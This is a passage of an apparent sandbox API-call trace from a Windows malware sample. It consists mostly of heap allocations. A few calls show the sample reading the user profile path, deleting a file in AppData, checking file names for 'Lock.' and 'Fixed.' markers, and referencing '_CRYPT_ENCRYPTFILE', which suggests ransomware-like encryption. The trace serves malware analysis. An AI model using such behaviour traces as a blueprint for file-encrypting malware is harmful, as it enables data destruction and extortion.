lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0220.160] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0220.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0220.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0220.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0220.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0220.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0220.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0220.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0220.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0220.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0220.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0220.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0220.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0220.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0220.162] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0220.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0220.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0220.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0220.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0220.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0220.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0220.163] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/-ZbS9.pps", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\-ZbS9.pps", lpFilePart=0x8cedf4*="-ZbS9.pps") returned 0x29 [0220.163] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\-ZbS9.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\-zbs9.pps")) returned 0x20 [0220.164] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\-ZbS9.pps", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fec6fb0, ftCreationTime.dwHighDateTime=0x1d5e79d, ftLastAccessTime.dwLowDateTime=0x68244cb0, ftLastAccessTime.dwHighDateTime=0x1d5e4c4, ftLastWriteTime.dwLowDateTime=0x68244cb0, ftLastWriteTime.dwHighDateTime=0x1d5e4c4, nFileSizeHigh=0x0, nFileSizeLow=0xf038, dwReserved0=0x1, dwReserved1=0x1c, cFileName="-ZbS9.pps", cAlternateFileName="")) returned 0xa87050 [0220.164] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\-ZbS9.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\-zbs9.pps")) returned 1 [0220.166] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fec6fb0, ftCreationTime.dwHighDateTime=0x1d5e79d, ftLastAccessTime.dwLowDateTime=0x68244cb0, ftLastAccessTime.dwHighDateTime=0x1d5e4c4, ftLastWriteTime.dwLowDateTime=0x68244cb0, ftLastWriteTime.dwHighDateTime=0x1d5e4c4, nFileSizeHigh=0x0, nFileSizeLow=0xf038, dwReserved0=0x1, dwReserved1=0x1c, cFileName="-ZbS9.pps", cAlternateFileName="")) returned 0 [0220.166] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0220.167] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0220.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0220.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0220.167] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0220.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0220.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0220.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0220.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0220.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0220.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0220.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0220.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0220.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0220.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0220.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0220.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0220.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0220.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0220.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0220.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0220.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0220.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0220.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x3be0dd0 [0220.168] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/-ZbS9.pps", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\-ZbS9.pps", lpFilePart=0x8cf650*="-ZbS9.pps") returned 0x29 [0220.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0220.168] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\-ZbS9.pps" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\-zbs9.pps")) returned 0xffffffff [0220.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0220.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0220.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0220.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0220.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0220.168] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0220.168] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.168] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0220.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0220.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0220.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0220.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0220.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0220.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0220.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0220.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0220.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0220.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0220.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0220.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0220.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0lKdr4kmMec0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lKdr4kmMec0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kdr4kmMec0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dr4kmMec0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r4kmMec0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4kmMec0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kmMec0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mMec0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mec0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ec0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0220.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0220.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0220.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0220.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0220.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0220.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0220.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0220.170] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0220.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0220.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0220.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0220.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0220.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0220.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0220.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0220.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0220.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0220.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0220.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0220.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0220.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0220.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0220.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0220.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0220.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0220.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x22) returned 0x977cf8 [0220.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0220.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0lKdr4kmMec0.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lKdr4kmMec0.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kdr4kmMec0.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dr4kmMec0.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r4kmMec0.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4kmMec0.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kmMec0.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mMec0.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mec0.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ec0.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c0.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0220.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0220.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0220.172] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0220.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0220.172] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0220.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0220.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0220.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0220.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0220.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0220.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0220.173] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0220.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0220.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0220.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0220.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0220.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0220.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0220.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0220.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0220.173] 